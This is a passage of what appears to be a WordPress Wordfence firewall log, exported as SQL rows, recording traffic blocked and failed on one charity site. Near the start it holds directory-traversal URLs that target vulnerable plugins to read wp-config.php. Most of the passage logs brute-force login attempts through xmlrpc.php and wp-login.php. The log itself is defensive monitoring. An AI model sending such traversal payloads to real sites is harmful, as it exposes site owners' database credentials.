wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6235,1629457134.124057,1629457133.327300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6236,0.000000,1629457267.460982,'\0\0\0\0\0\0\0\0\0\0��\"Qq',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6237,0.000000,1629457725.212001,'\0\0\0\0\0\0\0\0\0\0���@wP',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6238,0.000000,1629458234.535236,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6239,0.000000,1629458744.082921,'\0\0\0\0\0\0\0\0\0\0���t�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6240,0.000000,1629459210.045994,'\0\0\0\0\0\0\0\0\0\0���ࣶ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6241,0.000000,1629459680.487641,'\0\0\0\0\0\0\0\0\0\0���@v�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6242,0.000000,1629460196.440915,'\0\0\0\0\0\0\0\0\0\0����0',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6243,0.000000,1629460685.903559,'\0\0\0\0\0\0\0\0\0\0��ge�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6244,0.000000,1629461197.103850,'\0\0\0\0\0\0\0\0\0\0���1K',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6245,0.000000,1629461321.804137,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6246,1629461659.443246,1629461659.134600,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6247,1629461611.362727,1629461611.063700,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6248,1629461562.817352,1629461562.387600,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6249,1629461513.701066,1629461513.143600,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6250,1629461465.494211,1629461465.206700,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6251,1629461418.407102,1629461417.947600,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6252,1629461369.122508,1629461368.779500,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6253,0.000000,1629461679.123463,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6254,1629461708.355155,1629461707.857800,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6255,1629461917.732044,1629461917.430000,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6256,1629461869.117978,1629461868.817700,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6257,1629461769.881159,1629461769.604300,'\0\0\0\0\0\0\0\0\0\0���~d',0,503,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6258,0.000000,1629461968.438375,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(6259,0.000000,1629462021.716673,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(6260,0.000000,1629462072.248724,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://www.equalitywalk.org.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(6261,0.000000,1629462213.211962,'\0\0\0\0\0\0\0\0\0\0��H�.�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6262,0.000000,1629462723.459930,'\0\0\0\0\0\0\0\0\0\0���[J�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6263,0.000000,1629463221.080136,'\0\0\0\0\0\0\0\0\0\0��ár�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6264,0.000000,1629463720.077031,'\0\0\0\0\0\0\0\0\0\0����O�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6265,0.000000,1629464266.710674,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6266,0.000000,1629464777.467179,'\0\0\0\0\0\0\0\0\0\0��� �A',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6267,0.000000,1629465102.096919,'\0\0\0\0\0\0\0\0\0\0��n��,',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6268,0.000000,1629465107.741724,'\0\0\0\0\0\0\0\0\0\0��n��,',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6269,0.000000,1629465130.215639,'\0\0\0\0\0\0\0\0\0\0��Kv�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6270,0.000000,1629465148.753028,'\0\0\0\0\0\0\0\0\0\0��g�pC',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6271,0.000000,1629465166.914002,'\0\0\0\0\0\0\0\0\0\0����J�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6272,0.000000,1629465179.498540,'\0\0\0\0\0\0\0\0\0\0��-�p�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6273,0.000000,1629465185.528577,'\0\0\0\0\0\0\0\0\0\0��-�p�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6274,0.000000,1629465189.322975,'\0\0\0\0\0\0\0\0\0\0��-�p�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6275,0.000000,1629465201.851317,'\0\0\0\0\0\0\0\0\0\0��_�_d',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6276,0.000000,1629465204.767260,'\0\0\0\0\0\0\0\0\0\0��_�_d',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6277,0.000000,1629465219.645989,'\0\0\0\0\0\0\0\0\0\0��|y�c',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6278,0.000000,1629465221.982272,'\0\0\0\0\0\0\0\0\0\0��|y�c',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6279,0.000000,1629465239.963126,'\0\0\0\0\0\0\0\0\0\0���e�Z',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6280,0.000000,1629465242.886525,'\0\0\0\0\0\0\0\0\0\0���e�Z',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6281,0.000000,1629465246.370027,'\0\0\0\0\0\0\0\0\0\0���e�Z',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6282,0.000000,1629465272.973950,'\0\0\0\0\0\0\0\0\0\0��=Zl',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6283,0.000000,1629465292.566462,'\0\0\0\0\0\0\0\0\0\0��>��G',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6284,0.000000,1629465294.481553,'\0\0\0\0\0\0\0\0\0\0��/6��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6285,0.000000,1629465297.904244,'\0\0\0\0\0\0\0\0\0\0��/6��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6286,0.000000,1629465341.085860,'\0\0\0\0\0\0\0\0\0\0��sT\\�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6287,0.000000,1629465360.103484,'\0\0\0\0\0\0\0\0\0\0���˙',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6288,0.000000,1629465376.625642,'\0\0\0\0\0\0\0\0\0\0���#��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6289,0.000000,1629465380.057645,'\0\0\0\0\0\0\0\0\0\0���#��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6290,0.000000,1629465407.243969,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6291,0.000000,1629465438.850377,'\0\0\0\0\0\0\0\0\0\0���x��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6292,0.000000,1629465442.071067,'\0\0\0\0\0\0\0\0\0\0���x��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6293,0.000000,1629465474.610100,'\0\0\0\0\0\0\0\0\0\0��n� /',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6294,0.000000,1629465480.963101,'\0\0\0\0\0\0\0\0\0\0��n� /',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6295,0.000000,1629465520.750699,'\0\0\0\0\0\0\0\0\0\0���%Q',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6296,0.000000,1629465538.671204,'\0\0\0\0\0\0\0\0\0\0��sW�C',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6297,0.000000,1629465542.242102,'\0\0\0\0\0\0\0\0\0\0��sW�C',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6298,0.000000,1629465553.018670,'\0\0\0\0\0\0\0\0\0\0��Q���',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6299,0.000000,1629465558.887869,'\0\0\0\0\0\0\0\0\0\0��Q���',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6300,0.000000,1629465560.976437,'\0\0\0\0\0\0\0\0\0\0��Q���',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6301,0.000000,1629465582.218738,'\0\0\0\0\0\0\0\0\0\0��sW��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6302,0.000000,1629465585.705052,'\0\0\0\0\0\0\0\0\0\0��sW��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6303,0.000000,1629465589.773271,'\0\0\0\0\0\0\0\0\0\0��sW��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6304,0.000000,1629465644.958360,'\0\0\0\0\0\0\0\0\0\0��|y�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6305,0.000000,1629465650.202084,'\0\0\0\0\0\0\0\0\0\0��|y�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6306,0.000000,1629465652.394756,'\0\0\0\0\0\0\0\0\0\0��|y�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6307,0.000000,1629465664.432823,'\0\0\0\0\0\0\0\0\0\0���e�N',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6308,0.000000,1629465667.146374,'\0\0\0\0\0\0\0\0\0\0���e�N',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6309,0.000000,1629465669.574947,'\0\0\0\0\0\0\0\0\0\0���e�N',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6310,0.000000,1629465684.716972,'\0\0\0\0\0\0\0\0\0\0����ɵ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6311,0.000000,1629465686.937496,'\0\0\0\0\0\0\0\0\0\0����ɵ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6312,0.000000,1629465701.182118,'\0\0\0\0\0\0\0\0\0\0���C�,',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6313,0.000000,1629465705.788596,'\0\0\0\0\0\0\0\0\0\0���C�,',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6314,0.000000,1629465708.681158,'\0\0\0\0\0\0\0\0\0\0���C�,',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6315,0.000000,1629465724.375534,'\0\0\0\0\0\0\0\0\0\0���%\\',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6316,0.000000,1629465739.870403,'\0\0\0\0\0\0\0\0\0\0��:�(',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6317,0.000000,1629465782.797568,'\0\0\0\0\0\0\0\0\0\0��|x��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6318,0.000000,1629465788.731414,'\0\0\0\0\0\0\0\0\0\0��|x��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6319,0.000000,1629465793.099877,'\0\0\0\0\0\0\0\0\0\0��|x��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6320,0.000000,1629465808.196331,'\0\0\0\0\0\0\0\0\0\0��Q��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6321,0.000000,1629465811.423896,'\0\0\0\0\0\0\0\0\0\0��Q��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6322,0.000000,1629465813.988011,'\0\0\0\0\0\0\0\0\0\0��Q��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6323,0.000000,1629465817.768504,'\0\0\0\0\0\0\0\0\0\0��4��~',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 